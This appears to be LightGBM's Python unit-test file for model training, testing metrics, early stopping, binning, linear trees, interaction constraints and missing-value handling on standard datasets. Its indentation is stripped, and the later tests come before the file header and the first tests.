metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, False)
metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, False)
metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, 'l2', iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, 'l1', iter_valid1_l1, True)
metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_valid1_l1, True)
metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_min_valid1, False)
metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_min_valid1, False)
# test feval for lgb.train
metrics_combination_train_regression(lgb_valid1, 'None', 1, False,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_train_regression(lgb_valid1, 'None', 25, True,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_train_regression(lgb_valid1, 'None', 1, True,
feval=lambda preds, train_data: [constant_metric(preds, train_data),
decreasing_metric(preds, train_data)])
# test with two valid data for lgb.train
metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l2', 'l1'], iter_min_l2, True)
metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l2', 'l1'], iter_min_l2, True)
metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l1', 'l2'], iter_min_l1, True)
metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l1', 'l2'], iter_min_l1, True)
# test for lgb.cv
metrics_combination_cv_regression(None, iter_cv_l2, True, False)
metrics_combination_cv_regression('l2', iter_cv_l2, True, False)
metrics_combination_cv_regression('l1', iter_cv_l1, True, False)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, False)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, False)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, False)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, False)
metrics_combination_cv_regression(None, iter_cv_l2, True, True)
metrics_combination_cv_regression('l2', iter_cv_l2, True, True)
metrics_combination_cv_regression('l1', iter_cv_l1, True, True)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, True)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, True)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, True)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, True)
# test feval for lgb.cv
metrics_combination_cv_regression('None', 1, False, False,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_cv_regression('None', 25, True, False,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_cv_regression('None', 1, True, False,
feval=lambda preds, train_data: [constant_metric(preds, train_data),
decreasing_metric(preds, train_data)])
def test_node_level_subcol():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'feature_fraction_bynode': 0.8,
'feature_fraction': 1.0,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=25,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = log_loss(y_test, gbm.predict(X_test))
assert ret < 0.14
assert evals_result['valid_0']['binary_logloss'][-1] == pytest.approx(ret)
params['feature_fraction'] = 0.5
gbm2 = lgb.train(params, lgb_train, num_boost_round=25)
ret2 = log_loss(y_test, gbm2.predict(X_test))
assert ret != ret2
def test_forced_bins():
x = np.empty((100, 2))
x[:, 0] = np.arange(0, 1, 0.01)
x[:, 1] = -np.arange(0, 1, 0.01)
y = np.arange(0, 1, 0.01)
forcedbins_filename = (
Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins.json'
)
params = {'objective': 'regression_l1',
'max_bin': 5,
'forcedbins_filename': forcedbins_filename,
'num_leaves': 2,
'min_data_in_leaf': 1,
'verbose': -1}
lgb_x = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_x, num_boost_round=20)
new_x = np.zeros((3, x.shape[1]))
new_x[:, 0] = [0.31, 0.37, 0.41]
predicted = est.predict(new_x)
assert len(np.unique(predicted)) == 3
new_x[:, 0] = [0, 0, 0]
new_x[:, 1] = [-0.9, -0.6, -0.3]
predicted = est.predict(new_x)
assert len(np.unique(predicted)) == 1
params['forcedbins_filename'] = ''
lgb_x = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_x, num_boost_round=20)
predicted = est.predict(new_x)
assert len(np.unique(predicted)) == 3
params['forcedbins_filename'] = (
Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins2.json'
)
params['max_bin'] = 11
lgb_x = lgb.Dataset(x[:, :1], label=y)
est = lgb.train(params, lgb_x, num_boost_round=50)
predicted = est.predict(x[1:, :1])
_, counts = np.unique(predicted, return_counts=True)
assert min(counts) >= 9
assert max(counts) <= 11
def test_binning_same_sign():
# test that binning works properly for features with only positive or only negative values
x = np.empty((99, 2))
x[:, 0] = np.arange(0.01, 1, 0.01)
x[:, 1] = -np.arange(0.01, 1, 0.01)
y = np.arange(0.01, 1, 0.01)
params = {'objective': 'regression_l1',
'max_bin': 5,
'num_leaves': 2,
'min_data_in_leaf': 1,
'verbose': -1,
'seed': 0}
lgb_x = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_x, num_boost_round=20)
new_x = np.zeros((3, 2))
new_x[:, 0] = [-1, 0, 1]
predicted = est.predict(new_x)
assert predicted[0] == pytest.approx(predicted[1])
assert predicted[1] != pytest.approx(predicted[2])
new_x = np.zeros((3, 2))
new_x[:, 1] = [-1, 0, 1]
predicted = est.predict(new_x)
assert predicted[0] != pytest.approx(predicted[1])
assert predicted[1] == pytest.approx(predicted[2])
def test_dataset_update_params():
default_params = {"max_bin": 100,
"max_bin_by_feature": [20, 10],
"bin_construct_sample_cnt": 10000,
"min_data_in_bin": 1,
"use_missing": False,
"zero_as_missing": False,
"categorical_feature": [0],
"feature_pre_filter": True,
"pre_partition": False,
"enable_bundle": True,
"data_random_seed": 0,
"is_enable_sparse": True,
"header": True,
"two_round": True,
"label_column": 0,
"weight_column": 0,
"group_column": 0,
"ignore_column": 0,
"min_data_in_leaf": 10,
"linear_tree": False,
"precise_float_parser": True,
"verbose": -1}
unchangeable_params = {"max_bin": 150,
"max_bin_by_feature": [30, 5],
"bin_construct_sample_cnt": 5000,
"min_data_in_bin": 2,
"use_missing": True,
"zero_as_missing": True,
"categorical_feature": [0, 1],
"feature_pre_filter": False,
"pre_partition": True,
"enable_bundle": False,
"data_random_seed": 1,
"is_enable_sparse": False,
"header": False,
"two_round": False,
"label_column": 1,
"weight_column": 1,
"group_column": 1,
"ignore_column": 1,
"forcedbins_filename": "/some/path/forcedbins.json",
"min_data_in_leaf": 2,
"linear_tree": True,
"precise_float_parser": False}
X = np.random.random((100, 2))
y = np.random.random(100)
# decreasing without freeing raw data is allowed
lgb_data = lgb.Dataset(X, y, params=default_params, free_raw_data=False).construct()
default_params["min_data_in_leaf"] -= 1
lgb.train(default_params, lgb_data, num_boost_round=3)
# decreasing before lazy init is allowed
lgb_data = lgb.Dataset(X, y, params=default_params)
default_params["min_data_in_leaf"] -= 1
lgb.train(default_params, lgb_data, num_boost_round=3)
# increasing is allowed
default_params["min_data_in_leaf"] += 2
lgb.train(default_params, lgb_data, num_boost_round=3)
# decreasing with disabled filter is allowed
default_params["feature_pre_filter"] = False
lgb_data = lgb.Dataset(X, y, params=default_params).construct()
default_params["min_data_in_leaf"] -= 4
lgb.train(default_params, lgb_data, num_boost_round=3)
# decreasing with enabled filter is disallowed;
# also changes of other params are disallowed
default_params["feature_pre_filter"] = True
lgb_data = lgb.Dataset(X, y, params=default_params).construct()
for key, value in unchangeable_params.items():
new_params = default_params.copy()
new_params[key] = value
if key != "forcedbins_filename":
param_name = key
else:
param_name = "forced bins"
err_msg = ("Reducing `min_data_in_leaf` with `feature_pre_filter=true` may cause *"
if key == "min_data_in_leaf"
else f"Cannot change {param_name} *")
with np.testing.assert_raises_regex(lgb.basic.LightGBMError, err_msg):
lgb.train(new_params, lgb_data, num_boost_round=3)
def test_dataset_params_with_reference():
default_params = {"max_bin": 100}
X = np.random.random((100, 2))
y = np.random.random(100)
X_val = np.random.random((100, 2))
y_val = np.random.random(100)
lgb_train = lgb.Dataset(X, y, params=default_params, free_raw_data=False).construct()
lgb_val = lgb.Dataset(X_val, y_val, reference=lgb_train, free_raw_data=False).construct()
assert lgb_train.get_params() == default_params
assert lgb_val.get_params() == default_params
lgb.train(default_params, lgb_train, valid_sets=[lgb_val])
def test_extra_trees():
# check extra trees increases regularization
X, y = load_boston(return_X_y=True)
lgb_x = lgb.Dataset(X, label=y)
params = {'objective': 'regression',
'num_leaves': 32,
'verbose': -1,
'extra_trees': False,
'seed': 0}
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted = est.predict(X)
err = mean_squared_error(y, predicted)
params['extra_trees'] = True
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted_new = est.predict(X)
err_new = mean_squared_error(y, predicted_new)
assert err < err_new
def test_path_smoothing():
# check path smoothing increases regularization
X, y = load_boston(return_X_y=True)
lgb_x = lgb.Dataset(X, label=y)
params = {'objective': 'regression',
'num_leaves': 32,
'verbose': -1,
'seed': 0}
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted = est.predict(X)
err = mean_squared_error(y, predicted)
params['path_smooth'] = 1
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted_new = est.predict(X)
err_new = mean_squared_error(y, predicted_new)
assert err < err_new
def test_trees_to_dataframe():
pytest.importorskip("pandas")
def _imptcs_to_numpy(X, impcts_dict):
cols = [f'Column_{i}' for i in range(X.shape[1])]
return [impcts_dict.get(col, 0.) for col in cols]
X, y = load_breast_cancer(return_X_y=True)
data = lgb.Dataset(X, label=y)
num_trees = 10
bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
tree_df = bst.trees_to_dataframe()
split_dict = (tree_df[~tree_df['split_gain'].isnull()]
.groupby('split_feature')
.size()
.to_dict())
gains_dict = (tree_df
.groupby('split_feature')['split_gain']
.sum()
.to_dict())
tree_split = _imptcs_to_numpy(X, split_dict)
tree_gains = _imptcs_to_numpy(X, gains_dict)
mod_split = bst.feature_importance('split')
mod_gains = bst.feature_importance('gain')
num_trees_from_df = tree_df['tree_index'].nunique()
obs_counts_from_df = tree_df.loc[tree_df['node_depth'] == 1, 'count'].values
np.testing.assert_equal(tree_split, mod_split)
np.testing.assert_allclose(tree_gains, mod_gains)
assert num_trees_from_df == num_trees
np.testing.assert_equal(obs_counts_from_df, len(y))
# test edge case with one leaf
X = np.ones((10, 2))
y = np.random.rand(10)
data = lgb.Dataset(X, label=y)
bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
tree_df = bst.trees_to_dataframe()
assert len(tree_df) == 1
assert tree_df.loc[0, 'tree_index'] == 0
assert tree_df.loc[0, 'node_depth'] == 1
assert tree_df.loc[0, 'node_index'] == "0-L0"
assert tree_df.loc[0, 'value'] is not None
for col in ('left_child', 'right_child', 'parent_index', 'split_feature',
'split_gain', 'threshold', 'decision_type', 'missing_direction',
'missing_type', 'weight', 'count'):
assert tree_df.loc[0, col] is None
def test_interaction_constraints():
X, y = load_boston(return_X_y=True)
num_features = X.shape[1]
train_data = lgb.Dataset(X, label=y)
# check that constraint containing all features is equivalent to no constraint
params = {'verbose': -1,
'seed': 0}
est = lgb.train(params, train_data, num_boost_round=10)
pred1 = est.predict(X)
est = lgb.train(dict(params, interaction_constraints=[list(range(num_features))]), train_data,
num_boost_round=10)
pred2 = est.predict(X)
np.testing.assert_allclose(pred1, pred2)
# check that constraint partitioning the features reduces train accuracy
est = lgb.train(dict(params, interaction_constraints=[list(range(num_features // 2)),
list(range(num_features // 2, num_features))]),
train_data, num_boost_round=10)
pred3 = est.predict(X)
assert mean_squared_error(y, pred1) < mean_squared_error(y, pred3)
# check that constraints consisting of single features reduce accuracy further
est = lgb.train(dict(params, interaction_constraints=[[i] for i in range(num_features)]), train_data,
num_boost_round=10)
pred4 = est.predict(X)
assert mean_squared_error(y, pred3) < mean_squared_error(y, pred4)
# test that interaction constraints work when not all features are used
X = np.concatenate([np.zeros((X.shape[0], 1)), X], axis=1)
num_features = X.shape[1]
train_data = lgb.Dataset(X, label=y)
est = lgb.train(dict(params, interaction_constraints=[[0] + list(range(2, num_features)),
[1] + list(range(2, num_features))]),
train_data, num_boost_round=10)
def test_linear_trees(tmp_path):
# check that setting linear_tree=True fits better than ordinary trees when data has linear relationship
np.random.seed(0)
x = np.arange(0, 100, 0.1)
y = 2 * x + np.random.normal(0, 0.1, len(x))
x = x[:, np.newaxis]
lgb_train = lgb.Dataset(x, label=y)
params = {'verbose': -1,
'metric': 'mse',
'seed': 0,
'num_leaves': 2}
est = lgb.train(params, lgb_train, num_boost_round=10)
pred1 = est.predict(x)
lgb_train = lgb.Dataset(x, label=y)
res = {}
est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
valid_sets=[lgb_train], valid_names=['train'])
pred2 = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
# test again with nans in data
x[:10] = np.nan
lgb_train = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_train, num_boost_round=10)
pred1 = est.predict(x)
lgb_train = lgb.Dataset(x, label=y)
res = {}
est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
valid_sets=[lgb_train], valid_names=['train'])
pred2 = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
# test again with bagging
res = {}
est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
pred = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
# test with a feature that has only one non-nan value
x = np.concatenate([np.ones([x.shape[0], 1]), x], 1)
x[500:, 1] = np.nan
y[500:] += 10
lgb_train = lgb.Dataset(x, label=y)
res = {}
est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
pred = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
# test with a categorical feature
x[:250, 0] = 0
y[:250] += 10
lgb_train = lgb.Dataset(x, label=y)
est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
num_boost_round=10, categorical_feature=[0])
# test refit: same results on same data
est2 = est.refit(x, label=y)
p1 = est.predict(x)
p2 = est2.predict(x)
assert np.mean(np.abs(p1 - p2)) < 2
# test refit with save and load
temp_model = str(tmp_path / "temp_model.txt")
est.save_model(temp_model)
est2 = lgb.Booster(model_file=temp_model)
est2 = est2.refit(x, label=y)
p1 = est.predict(x)
p2 = est2.predict(x)
assert np.mean(np.abs(p1 - p2)) < 2
# test refit: different results training on different data
est3 = est.refit(x[:100, :], label=y[:100])
p3 = est3.predict(x)
assert np.mean(np.abs(p2 - p1)) > np.abs(np.max(p3 - p1))
# test when num_leaves - 1 < num_features and when num_leaves - 1 > num_features
X_train, _, y_train, _ = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1, random_state=2)
params = {'linear_tree': True,
'verbose': -1,
'metric': 'mse',
'seed': 0}
train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=2))
est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=60))
est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
def test_save_and_load_linear(tmp_path):
X_train, X_test, y_train, y_test = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1,
random_state=2)
X_train = np.concatenate([np.ones((X_train.shape[0], 1)), X_train], 1)
X_train[:X_train.shape[0] // 2, 0] = 0
y_train[:X_train.shape[0] // 2] = 1
params = {'linear_tree': True}
train_data_1 = lgb.Dataset(X_train, label=y_train, params=params)
est_1 = lgb.train(params, train_data_1, num_boost_round=10, categorical_feature=[0])
pred_1 = est_1.predict(X_train)
tmp_dataset = str(tmp_path / 'temp_dataset.bin')
train_data_1.save_binary(tmp_dataset)
train_data_2 = lgb.Dataset(tmp_dataset)
est_2 = lgb.train(params, train_data_2, num_boost_round=10)
pred_2 = est_2.predict(X_train)
np.testing.assert_allclose(pred_1, pred_2)
model_file = str(tmp_path / 'model.txt')
est_2.save_model(model_file)
est_3 = lgb.Booster(model_file=model_file)
pred_3 = est_3.predict(X_train)
np.testing.assert_allclose(pred_2, pred_3)
def test_linear_single_leaf():
X_train, y_train = load_breast_cancer(return_X_y=True)
train_data = lgb.Dataset(X_train, label=y_train)
params = {
"objective": "binary",
"linear_tree": True,
"min_sum_hessian": 5000
}
bst = lgb.train(params, train_data, num_boost_round=5)
y_pred = bst.predict(X_train)
assert log_loss(y_train, y_pred) < 0.661
def test_predict_with_start_iteration():
def inner_test(X, y, params, early_stopping_rounds):
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
train_data = lgb.Dataset(X_train, label=y_train)
valid_data = lgb.Dataset(X_test, label=y_test)
booster = lgb.train(params, train_data, num_boost_round=50, early_stopping_rounds=early_stopping_rounds,
valid_sets=[valid_data])
# test that the predict once with all iterations equals summed results with start_iteration and num_iteration
all_pred = booster.predict(X, raw_score=True)
all_pred_contrib = booster.predict(X, pred_contrib=True)
steps = [10, 12]
for step in steps:
pred = np.zeros_like(all_pred)
pred_contrib = np.zeros_like(all_pred_contrib)
for start_iter in range(0, 50, step):
pred += booster.predict(X, start_iteration=start_iter, num_iteration=step, raw_score=True)
pred_contrib += booster.predict(X, start_iteration=start_iter, num_iteration=step, pred_contrib=True)
np.testing.assert_allclose(all_pred, pred)
np.testing.assert_allclose(all_pred_contrib, pred_contrib)
# test the case where start_iteration <= 0, and num_iteration is None
pred1 = booster.predict(X, start_iteration=-1)
pred2 = booster.predict(X, num_iteration=booster.best_iteration)
np.testing.assert_allclose(pred1, pred2)
# test the case where start_iteration > 0, and num_iteration <= 0
pred4 = booster.predict(X, start_iteration=10, num_iteration=-1)
pred5 = booster.predict(X, start_iteration=10, num_iteration=90)
pred6 = booster.predict(X, start_iteration=10, num_iteration=0)
np.testing.assert_allclose(pred4, pred5)
np.testing.assert_allclose(pred4, pred6)
# test the case where start_iteration > 0, and num_iteration <= 0, with pred_leaf=True
pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_leaf=True)
pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_leaf=True)
pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_leaf=True)
np.testing.assert_allclose(pred4, pred5)
np.testing.assert_allclose(pred4, pred6)
# test the case where start_iteration > 0, and num_iteration <= 0, with pred_contrib=True
pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_contrib=True)
pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_contrib=True)
pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_contrib=True)
np.testing.assert_allclose(pred4, pred5)
np.testing.assert_allclose(pred4, pred6)
# test for regression
X, y = load_boston(return_X_y=True)
params = {
'objective': 'regression',
'verbose': -1,
'metric': 'l2',
'learning_rate': 0.5
}
# test both with and without early stopping
inner_test(X, y, params, early_stopping_rounds=1)
inner_test(X, y, params, early_stopping_rounds=5)
inner_test(X, y, params, early_stopping_rounds=None)
# test for multi-class
X, y = load_iris(return_X_y=True)
params = {
'objective': 'multiclass',
'num_class': 3,
'verbose': -1,
'metric': 'multi_error'
}
# test both with and without early stopping
inner_test(X, y, params, early_stopping_rounds=1)
inner_test(X, y, params, early_stopping_rounds=5)
inner_test(X, y, params, early_stopping_rounds=None)
# test for binary
X, y = load_breast_cancer(return_X_y=True)
params = {
'objective': 'binary',
'verbose': -1,
'metric': 'auc'
}
# test both with and without early stopping
inner_test(X, y, params, early_stopping_rounds=1)
inner_test(X, y, params, early_stopping_rounds=5)
inner_test(X, y, params, early_stopping_rounds=None)
def test_average_precision_metric():
# test against sklearn average precision metric
X, y = load_breast_cancer(return_X_y=True)
params = {
'objective': 'binary',
'metric': 'average_precision',
'verbose': -1
}
res = {}
lgb_X = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=res)
ap = res['training']['average_precision'][-1]
pred = est.predict(X)
sklearn_ap = average_precision_score(y, pred)
assert ap == pytest.approx(sklearn_ap)
# test that average precision is 1 where model predicts perfectly
y = y.copy()
y[:] = 1
lgb_X = lgb.Dataset(X, label=y)
lgb.train(params, lgb_X, num_boost_round=1, valid_sets=[lgb_X], evals_result=res)
assert res['training']['average_precision'][-1] == pytest.approx(1)
def test_reset_params_works_with_metric_num_class_and_boosting():
X, y = load_breast_cancer(return_X_y=True)
dataset_params = {"max_bin": 150}
booster_params = {
'objective': 'multiclass',
'max_depth': 4,
'bagging_fraction': 0.8,
'metric': ['multi_logloss', 'multi_error'],
'boosting': 'gbdt',
'num_class': 5
}
dtrain = lgb.Dataset(X, y, params=dataset_params)
bst = lgb.Booster(
params=booster_params,
train_set=dtrain
)
expected_params = dict(dataset_params, **booster_params)
assert bst.params == expected_params
booster_params['bagging_fraction'] += 0.1
new_bst = bst.reset_parameter(booster_params)
expected_params = dict(dataset_params, **booster_params)
assert bst.params == expected_params
assert new_bst.params == expected_params
def test_dump_model():
X, y = load_breast_cancer(return_X_y=True)
train_data = lgb.Dataset(X, label=y)
params = {
"objective": "binary",
"verbose": -1
}
bst = lgb.train(params, train_data, num_boost_round=5)
dumped_model_str = str(bst.dump_model(5, 0))
assert "leaf_features" not in dumped_model_str
assert "leaf_coeff" not in dumped_model_str
assert "leaf_const" not in dumped_model_str
assert "leaf_value" in dumped_model_str
assert "leaf_count" in dumped_model_str
params['linear_tree'] = True
train_data = lgb.Dataset(X, label=y)
bst = lgb.train(params, train_data, num_boost_round=5)
dumped_model_str = str(bst.dump_model(5, 0))
assert "leaf_features" in dumped_model_str
assert "leaf_coeff" in dumped_model_str
assert "leaf_const" in dumped_model_str
assert "leaf_value" in dumped_model_str
assert "leaf_count" in dumped_model_str
| # coding: utf-8
import copy
import itertools
import math
import pickle
import platform
import random
from pathlib import Path
import numpy as np
import psutil
import pytest
from scipy.sparse import csr_matrix, isspmatrix_csc, isspmatrix_csr
from sklearn.datasets import load_svmlight_file, make_multilabel_classification
from sklearn.metrics import average_precision_score, log_loss, mean_absolute_error, mean_squared_error, roc_auc_score
from sklearn.model_selection import GroupKFold, TimeSeriesSplit, train_test_split
import lightgbm as lgb
from .utils import load_boston, load_breast_cancer, load_digits, load_iris
decreasing_generator = itertools.count(0, -1)
def dummy_obj(preds, train_data):
return np.ones(preds.shape), np.ones(preds.shape)
def multi_logloss(y_true, y_pred):
return np.mean([-math.log(y_pred[i][y]) for i, y in enumerate(y_true)])
def top_k_error(y_true, y_pred, k):
if k == y_pred.shape[1]:
return 0
max_rest = np.max(-np.partition(-y_pred, k)[:, k:], axis=1)
return 1 - np.mean((y_pred[np.arange(len(y_true)), y_true] > max_rest))
def constant_metric(preds, train_data):
return ('error', 0.0, False)
def decreasing_metric(preds, train_data):
return ('decreasing_metric', next(decreasing_generator), False)
def categorize(continuous_x):
return np.digitize(continuous_x, bins=np.arange(0, 1, 0.01))
def test_binary():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
'num_iteration': 50 # test num_iteration in dict here
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=20,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = log_loss(y_test, gbm.predict(X_test))
assert ret < 0.14
assert len(evals_result['valid_0']['binary_logloss']) == 50
assert evals_result['valid_0']['binary_logloss'][-1] == pytest.approx(ret)
def test_rf():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'boosting_type': 'rf',
'objective': 'binary',
'bagging_freq': 1,
'bagging_fraction': 0.5,
'feature_fraction': 0.5,
'num_leaves': 50,
'metric': 'binary_logloss',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = log_loss(y_test, gbm.predict(X_test))
assert ret < 0.19
assert evals_result['valid_0']['binary_logloss'][-1] == pytest.approx(ret)
def test_regression():
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'metric': 'l2',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = mean_squared_error(y_test, gbm.predict(X_test))
assert ret < 7
assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle():
X_train = np.zeros((100, 1))
y_train = np.zeros(100)
trues = random.sample(range(100), 20)
for idx in trues:
X_train[idx, 0] = np.nan
y_train[idx] = 1
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'metric': 'l2',
'verbose': -1,
'boost_from_average': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=20,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = mean_squared_error(y_train, gbm.predict(X_train))
assert ret < 0.005
assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle_more_na():
X_train = np.ones((100, 1))
y_train = np.ones(100)
trues = random.sample(range(100), 80)
for idx in trues:
X_train[idx, 0] = np.nan
y_train[idx] = 0
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'metric': 'l2',
'verbose': -1,
'boost_from_average': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=20,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = mean_squared_error(y_train, gbm.predict(X_train))
assert ret < 0.005
assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle_na():
x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
y = [1, 1, 1, 1, 0, 0, 0, 0, 1]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'zero_as_missing': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_missing_value_handle_zero():
x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'zero_as_missing': True
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_missing_value_handle_none():
x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'use_missing': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
